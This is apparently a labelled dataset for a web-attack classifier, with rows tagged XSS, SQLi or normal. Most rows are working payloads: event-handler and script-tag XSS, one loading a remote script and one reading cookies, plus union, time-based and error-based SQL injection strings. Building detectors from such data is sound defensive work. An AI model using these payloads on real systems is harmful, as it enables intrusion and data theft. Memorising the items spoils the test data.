onfocus=""alert(1)"">",1,XSS,16 "<big onbeforecut=""alert(1)"" contenteditable>test</big>",1,XSS,4780 "<;SCRIPT a="";>;""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,2794 "1', ( select ( case when ( 6894 = 6087 ) then 1 else 6894* ( select 6894 from information_schema.character_sets ) end ) )",2,SQLi,13101 "1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'ngwt' = 'ngwt",2,SQLi,11143 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#",2,SQLi,18038 select ( case when ( 6166 = 3364 ) then 6166 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13607 "<dir oncut=""alert(1)"" contenteditable>test</dir>",1,XSS,5924 "select * from users where id = 1 or ""@?"" or 1 = 1 -- 1",2,SQLi,17923 Where's your SQL dataset?,3,normal,23420 "=+benchmark(3200,SHA1(1))+'",2,SQLi,9884 --></style></script><svg oNload=alert()>,1,XSS,8070 "1%"" ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""%"" = """,2,SQLi,13032 Where's the nearest gas station?,3,normal,23495 "Immediately afterward he was a member of a commission appointed ""to revise the laws in force in the state; to select, abridge, alter and digest them, so as to be accommodated to the present government.""",3,normal,26037 ";alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,100 <param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus>,1,XSS,2608 "1 ) ) as dnwj where 2961 = 2961 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11074 "( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ""%"" = """,2,SQLi,16730 "1"" ) ) union all select null,null,null#",2,SQLi,19640 1' ) as bzem where 4240 = 4240,2,SQLi,20571 <img alt='%></xmp><img src=xx:x onerror=aler,1,XSS,7041 "{""id"":null,""firstName"":""Yap"",""lastName"":""Chin"",""address"":""146 EAST FIRST AVE, WILLIAMSON WV 25661"",""city"":""475"",""telephone"":""5079823086""}",3,normal,26917 "<div id=""29""><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//[""'`-->]]>]</div><div id=""30""><style>@import ""data:,*%7bx:expression(alert(30))%7D"";</style>//[""'`-->]]>]</div><div id=""31""><frameset onload=alert(31)>//[""'`-->]]>]</div><div id=""32""><table background=""javascript:alert(32)""></table>//[""'`-->]]>]</div><div id=""33""><a style=""pointer-events:none;position:absolute;""><a style=""position:absolute;"" onclick=""alert(33);"">XXX</a></a><a href=""javascript:alert(2)"">XXX</a>//[""'`-->]]>]</div><div id=""34"">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//[""'`-->]]>]</div><div id=""35"">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//[""'`-->]]>]</div><div id=""36""><a style=""behavior:url(#default#AnchorClick);"" folder=""javascript:alert(36)"">XXX</a>//[""'`-->]]>]</div><div id=""37""><!--<img src=""--><img src=x onerror=alert(37)//"">//[""'`-->]]>]</div><div id=""38""><comment><img src=""</comment><img src=x onerror=alert(38)//"">//[""'`-->]]>]</div>",1,XSS,7 "1"" ) ) ) and elt ( 2421 = 9612,9612 ) and ( ( ( ""gbdx"" like ""gbdx",2,SQLi,16719 ORDER BY 16,2,SQLi,22374 "<pre onkeypress=""alert(1)"" contenteditable>test</pre>",1,XSS,5014 1%' rlike sleep ( 5 ) and '%' = ',2,SQLi,20222 "{""id"":null,""firstName"":""Ivan"",""lastName"":""Lock"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26885 <frame id=x tabindex=1 onactivate=alert(1)></frame>,1,XSS,5415 "<font onclick=""alert(1)"">test</font>",1,XSS,8806 "<style>@keyframes slidein {}</style><s style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></s>",1,XSS,463 -8370' ) ) or ( 3501 = 6407 ) *6407 and ( ( 'agcm' like 'agcm,2,SQLi,17048 "<style>@keyframes slidein {}</style><dd style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></dd>",1,XSS,442 "{""id"":null,""firstName"":""Shirley"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27473 Select aid.,3,normal,24740 Select your message.,3,normal,24904 -5852 ) as anca where 3574 = 3574 or 3958 = 5536#,2,SQLi,18591 "1'+ ( select mumb where 4658 = 4658 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11578 "-5026' where 7324 = 7324 union all select 7324,7324--",2,SQLi,18060 "<html onMouseUp html onMouseUp=""javascript:javascript:alert(1)""></html onMouseUp>",1,XSS,1940 ORDER BY 28--,2,SQLi,22251 <keygen autofocus onfocus=alert(1)>,1,XSS,9120 ORDER BY SLEEP(5),2,SQLi,22084 "<em draggable=""true"" ondragleave=""alert(1)"">test</em>",1,XSS,4872 Where's the best place to take a stroll?,3,normal,23878 "From here, select the data-hogging apps and disable background data.",3,normal,26168 "1"" ) as qjyu where 2679 = 2679 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12093 <audio onpointerout=alert(1)>XSS</audio>,1,XSS,7978 "Buy 1, get 1 free* on select Nature Made® vitamins.",3,normal,26305 "AND ELT(1337=1337,SLEEP(5)) AND 1337""=""1337",2,SQLi,19166 Getting herself fired allowed Trump to select a non-conflicted replacement.,3,normal,26146 "1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'tvar' = 'tvar",2,SQLi,11100 "1"" ) ) union all select null,null,null,null,null,null,null#",2,SQLi,17310 "<slot onmouseenter=""alert(1)"">test</slot>",1,XSS,7707 "-1917"" ) or 8571 = 8571--",2,SQLi,21082 Demonstrate the ability to select relevant principles from theories to support the practice of Occupational therapy.,3,normal,26247 1' ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( 'vpqr' = 'vpqr,2,SQLi,15040 "<div id=""94""><svg xmlns=""http://www.w3.org/2000/svg"">",1,XSS,5071 "1"" ) where 2633 = 2633 union all select null,null,null,null#",2,SQLi,17161 "<iframe onmouseout=""alert(1)"">test</iframe>",1,XSS,7225 "-6731"" where 6166 = 6166 union all select 6166,6166,6166,6166,6166,6166--",2,SQLi,15898 I'm thinking of where to go for some relaxation.,3,normal,23936 "<div draggable=""true"" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen>",1,XSS,881 "{""id"":null,""name"":""Blitzle""}",3,normal,27225 "1' ) ) ) union all select null,null,null,null#",2,SQLi,18967 "1' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'ynpr' = 'ynpr",2,SQLi,12581 "Olsen, who joined M&G in April 2014, will remain manager of the M&G Global Select Fund and the M&G Pan European Select Fund.",3,normal,25857 "<u onbeforecopy=""alert(1)"" contenteditable>test</u>",1,XSS,5467 "<meter onmousedown=""alert(1)"">test</meter>",1,XSS,7514 1' ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ),2,SQLi,15957 "<abbr onmouseenter=""alert(1)"">test</abbr>",1,XSS,7667 "1"" or sleep ( 5 )",2,SQLi,22101 "<style>:target {transform: rotate(180deg);}</style><listing id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></listing>",1,XSS,570 Insert code.,3,normal,23049 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",2,SQLi,16742 "-5245"" ) ) ) union all select 8106,8106,8106#",2,SQLi,19038 "1'|| ( select 'xpjg' where 3036 = 3036 and elt ( 1832 = 6644,6644 ) ) ||'",2,SQLi,15866 <b onpointerup=alert(1)>XSS</b>,1,XSS,9504 "1 ) where 9206 = 9206 union all select null,null,null,null,null,null#",2,SQLi,16289 "1"" ) where 2834 = 2834 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10859 "<frame onmouseenter=""alert(1)"">test</frame>",1,XSS,7184 Select surprise.,3,normal,24733 "<style onmouseup=""alert(1)"">test</style>",1,XSS,8049 "1 ) where 7425 = 7425 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14678 "{""id"":null,""firstName"":""Kieu"",""lastName"":""Doan"",""address"":""6980 Dorsett Rd"",""city"":""567"",""telephone"":""3812314136""}",3,normal,27524 <script> Object.prototype.srcdoc=['<script>alert(1)<\/script>']</script>,1,XSS,2335 "{""id"":null,""firstName"":""Eve"",""lastName"":""Ang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27166 "{""id"":null,""firstName"":""Adrian"",""lastName"":""Khong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26863 <rb onpointerdown=alert(1)>XSS</rb>,1,XSS,9084 How did you select which women to feature in the documentary?,3,normal,26084 <header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus>,1,XSS,2527 &lt;,1,XSS,9879 1'+ ( select aqhj where 4419 = 4419,2,SQLi,20042 "1"" ) order by 1#",2,SQLi,22141 select case when 3252 = 9622 then 1 else null end--,2,SQLi,18309 "<summary onmouseover=""alert(1)"">test</summary>",1,XSS,6491 1' ) as yxdb where 4597 = 4597,2,SQLi,20634 "<samp onkeypress=""alert(1)"" contenteditable>test</samp>",1,XSS,4456 "{""id"":null,""name"":""course""}",3,normal,27312 "{""id"":16436,""name"":""jmeter test <DO NOT DELETE>""}",3,normal,26803 "and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19796 "-4721' ) or elt ( 4378 = 5165,5165 ) and ( 'fufn' = 'fufn",2,SQLi,17525 "select * from users where id = 1 or 1#""@ union select 1,version ( ) -- 1",2,SQLi,15947 "<b oncopy=""alert(1)"" contenteditable>test</b>",1,XSS,6736 "1' ) as wnys where 6457 = 6457 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,15041 Let's choose a location for our gathering.,3,normal,23971 "<thead onbeforecut=""alert(1)"" contenteditable>test</thead>",1,XSS,3894 <tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus>,1,XSS,2615 "( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ""%"" = """,2,SQLi,16866 "<u onmousemove=""alert(1)"">test</u>",1,XSS,9241 "<hr oncopy=""alert(1)"" contenteditable>test</hr>",1,XSS,6178 "1"" where 7788 = 7788 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11542 Select your desire.,3,normal,24939 Select a song to play.,3,normal,24162 -1985 ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 1248 = 1248,2,SQLi,9977 <footer onpointerenter=alert(1)>XSS</footer>,1,XSS,6938 "1%' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( '%' = '",2,SQLi,12162 "<video autoplay controls onwaiting=alert(1)><source src=""validvideo.mp4"" type=video/mp4></video>",1,XSS,1577 "1%"" ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ""%"" = """,2,SQLi,13150 "<frame onmouseup=""alert(1)"">test</frame>",1,XSS,7991 Search records where relevant.,3,normal,23261 perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out,1,XSS,1585 "1' ) and make_set ( 6488 = 5525,5525 )",2,SQLi,19788 "<style>@keyframes x{}</style><footer style=""animation-name:x"" onanimationend=""alert(1)""></footer>",1,XSS,1522 "{""id"":null,""name"":""Venipede""}",3,normal,27300 "<style>@keyframes x{}</style><style style=""animation-name:x"" onanimationend=""alert(1)""></style>",1,XSS,1619 "1"" union all select null,null#",2,SQLi,20649 "1%' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( '%' = '",2,SQLi,12145 "-1617%"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""%"" = """,2,SQLi,10788 "{""id"":null,""firstName"":""Chai"",""lastName"":""Kon Moi"",""address"":""305 W 45th St, New York NY 10036"",""city"":""957"",""telephone"":""4065619129""}",3,normal,26750 "1%' ) ) ) and elt ( 7425 = 3843,3843 ) and ( ( ( '%' = '",2,SQLi,17633 <img src =q onerror=prompt(8)>,1,XSS,9525 "1"" ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ""rfpq"" = ""rfpq",2,SQLi,12628 Select your reflect.,3,normal,24978 "1"" ) ) as wwqj where 3249 = 3249 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12049 "SRC=# onmouseover=""alert(document.cookie)",1,XSS,7624 -8963 ) where 8528 = 8528 or ( 2470 = 3271 ) *3271--,2,SQLi,18168 `'><script>\xE2\x80\x8Ajavascript:alert(513)</script>,1,XSS,5060 "{""id"":null,""firstName"":""Tony Quek"",""lastName"":""Quek"",""address"":""115 N WEBB RD, GRAND ISLAND NE 68803"",""city"":""229"",""telephone"":""4614015193""}",3,normal,27352 "1'|| ( select 'vixv' from dual where 7704 = 7704 union all select null,null,null,null,null--",2,SQLi,14588 Select buy.,3,normal,24562 "1%' ) ) ) union all select null,null,null,null#",2,SQLi,18820 <time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus>,1,XSS,2320 <x%09onxxx=1,1,XSS,9832 "<style>@keyframes slidein {}</style><slot style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></slot>",1,XSS,407 "<script>$(""span.foo"").click(function() {alert('foo');$(""a.bar"").click();});$(""a.bar"").click(function() {alert('bar');location=""http://html5sec.org"";});</script>//[""'`-->]]>]</div>",1,XSS,221 "<audio onkeypress=""alert(1)"" contenteditable>test</audio>",1,XSS,4125 Select first.,3,normal,24489 "1 ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,13962 Join hike.,3,normal,23048 "echo('IPT>alert(""XSS"")</SCRIPT>'); ?>",1,XSS,8759 <bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus>,1,XSS,2039 "<html onmouseover=""alert(1)"">test</html>",1,XSS,7950 "<style>:target {color:red;}</style><spacer id=x style=""transition:color 1s"" ontransitionend=alert(1)></spacer>",1,XSS,1024 "<source onmouseup=""alert(1)"">test</source>",1,XSS,7437 1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,10909 "1"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""yrgy"" like ""yrgy",2,SQLi,13758 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></big>",1,XSS,268 1' ) ) and sleep ( 5 ) and ( ( 'tcwt' = 'tcwt,2,SQLi,19036 "<nobr onclick=""alert(1)"">test</nobr>",1,XSS,8864 "<noembed onkeyup=""alert(1)"" contenteditable>test</noembed>",1,XSS,3829 Select a game for family game night.,3,normal,24201 "1"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""bkrk"" = ""bkrk",2,SQLi,11037 Where's the mindfulness workshop?,3,normal,23661 "<style>@keyframes x{}</style><datalist style=""animation-name:x"" onanimationstart=""alert(1)""></datalist>",1,XSS,1353 "select * from users where id = 1 or "".]"" or 1 = 1 -- 1",2,SQLi,17867 Select a book for your reading pleasure.,3,normal,24010 "1 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) -- fzhj",2,SQLi,10958 "select * from users where id = 1 +\. union select null,@@VERSION -- 1",2,SQLi,16264 <![CDATA[<script>var n=0;while(true){n++;}</script>]]>,1,XSS,4667 "<style>:target {color: red;}</style><i id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></i>",1,XSS,1265 "-2384%' ) ) union all select 2467,2467,2467,2467#",2,SQLi,18596 "<element onkeydown=""alert(1)"" contenteditable>test</element>",1,XSS,3586 "<ins onkeyup=""alert(1)"" contenteditable>test</ins>",1,XSS,5526 "<nav oncontextmenu=""alert(1)"">test</nav>",1,XSS,7916 <select onpointerout=alert(1)>XSS</select>,1,XSS,7475 "<data onkeydown=""alert(1)"" contenteditable>test</data>",1,XSS,4725 "create or replace function sleep ( int ) returns int as '/lib/libc.so.6','sleep' language 'c' strict",2,SQLi,14151 union (select @@version) --,2,SQLi,20850 1 ) ) ) order by 1--,2,SQLi,21866 "<center oncut=""alert(1)"" contenteditable>test</center>",1,XSS,4764 "<hr onbeforecopy=""alert(1)"" contenteditable>test</hr>",1,XSS,4970 Congratulations to our own @ JulienMid and @ Value247 who have been selected on Team @ Yassuo for the upcoming League of Legends Twitch Rivals!... Will Value secure the three-peat? Will Julien win his first championship? Find out next week!..,3,normal,26513 1' or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,17493 "-2864' ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'vjbl' = 'vjbl",2,SQLi,10204 1 ) ) rlike ( select ( case when ( 6113 = 1222 ) then 1 else 0x28 end ) ) and ( ( 2815 = 2815,2,SQLi,14487 "1' ) where 8948 = 8948 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14455 Select the right shade of lipstick.,3,normal,24097 "1 ) where 5550 = 5550 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10869 "<header onbeforecut=""alert(1)"" contenteditable>test</header>",1,XSS,3519 "<style>@keyframes slidein {}</style><cite style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></cite>",1,XSS,397 <li onblur=alert(1) tabindex=1 id=x></li><input autofocus>,1,XSS,3835 Delete the email.,3,normal,22873 "To unfreeze the frames, select ""View,"" then select ""Unfreeze Panes.""",3,normal,25258 "<kbd onbeforecut=""alert(1)"" contenteditable>test</kbd>",1,XSS,4710 1 or sleep ( 5 ) #,2,SQLi,22064 "<center draggable=""true"" ondragenter=""alert(1)"">test</center>",1,XSS,3309 <command onpointerleave=alert(1)>XSS</command>,1,XSS,6293 "1"" ) rlike sleep ( 5 ) #",2,SQLi,21234 <table id=x tabindex=1 onactivate=alert(1)></table>,1,XSS,5442 <dl onpointerout=alert(1)>XSS</dl>,1,XSS,9263 "In a primary, voters select one candidate on a ballot.",3,normal,26020 "1"" ) ) as whyr where 9731 = 9731 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --",2,SQLi,14641